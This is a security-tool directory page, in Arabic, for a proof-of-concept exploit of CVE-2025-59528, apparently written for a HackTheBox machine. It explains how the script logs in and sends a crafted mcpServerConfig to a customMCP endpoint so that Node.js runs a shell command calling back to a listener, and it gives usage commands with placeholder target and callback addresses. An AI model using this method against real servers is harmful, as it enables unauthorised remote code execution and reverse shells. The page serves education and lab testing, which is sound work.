Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59528-PoC — PoC لثغرة CVE-2025-59528 المستخدمة لتحقيق تنفيذ كود عن بُعد على آلة Silentium في HTB | Kitploit
أدوات/GitHubGitHub/loaxert/cve-2025-59528-poc
الاستغلالاستغلال تطبيقات الويباختبار أمان APIاختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

PoC لثغرة CVE-2025-59528 المستخدمة لتحقيق تنفيذ كود عن بُعد على آلة Silentium في HTB

عرض المستودع
17منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 إثبات المفهوم التعليمي

للاستخدام التعليمي فقط. هذا المشروع مخصص للأبحاث الأمنية الخاضعة للرقابة، والعروض التوضيحية في الفصول الدراسية، والاختبارات المصرح بها في مختبر معزول. لا تستخدمه ضد أنظمة أو شبكات أو تطبيقات أو حسابات لا تملكها أو ليس لديك إذن صريح لاختبارها.

ما الذي يوضحه إثبات المفهوم هذا

يوضح إثبات المفهوم هذا كيف يمكن لقيمة mcpServerConfig التي لا تتم معالجتها بشكل صحيح أن تسمح بتنفيذ JavaScript من جانب الخادم وتنفيذ أوامر من خلال وظيفة تحميل العقدة customMCP.

يدعم السكريبت طريقتين للمصادقة:

  • البريد الإلكتروني/كلمة المرور: المصادقة عبر نقطة نهاية تسجيل الدخول في التطبيق وإعادة استخدام ملفات تعريف الارتباط الخاصة بالجلسة المُعادة.
  • رمز الحامل (Bearer token): إرسال مفتاح API في ترويسة Authorization.

بعد المصادقة، يرسل السكريبت إعدادًا مصممًا إلى /api/v1/node-load-method/customMCP. تستخدم الحمولة وظيفة العمليات الفرعية في Node.js لتنفيذ أمر shell والاتصال مرة أخرى بمستمع يتحكم فيه الباحث. أُدرج هذا السلوك فقط لإظهار التأثير المحتمل في بيئة مختبر مصرح بها.

المتطلبات

  • Python 3.
  • حزمة requests.

ثبّت التبعية باستخدام:

root@kitploit:~
python3 -m pip install requests

الاستخدام

احفظ السكريبت باسم CVE-2025-59528.py.

وضع البريد الإلكتروني وكلمة المرور

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

مثال بقيم للتوثيق فقط:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

وضع رمز الحامل (Bearer token)

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

مثال بقيم للتوثيق فقط:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

يتوقع السكريبت توفر مسارات التطبيق التالية:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

يبني السكريبت الحالي عناوين http://. حدّث التنفيذ لاستخدام HTTPS عند اختبار نشر معملي يتطلب TLS.

كيف يعمل الكود

  1. تتحقق main() من عدد وسائط سطر الأوامر وتختار وضع المصادقة.
  2. ترسل login() البيانات المعتمدة المقدمة إلى نقطة نهاية تسجيل الدخول.
  3. تستخرج tokens() قيم الجلسة من ترويسة استجابة Set-Cookie.
  4. تبني shell() الطلب المصادق عليه وتُرسل قيمة mcpServerConfig المصممة.
  5. تنفذ bearer() الطلب نفسه باستخدام رمز حامل بدلاً من ملفات تعريف الارتباط الخاصة بالجلسة.
  6. تتم طباعة نص الاستجابة حتى يتمكن الباحث من ربط النتيجة بسجلات التطبيق والخادم.
تنزيل الأداة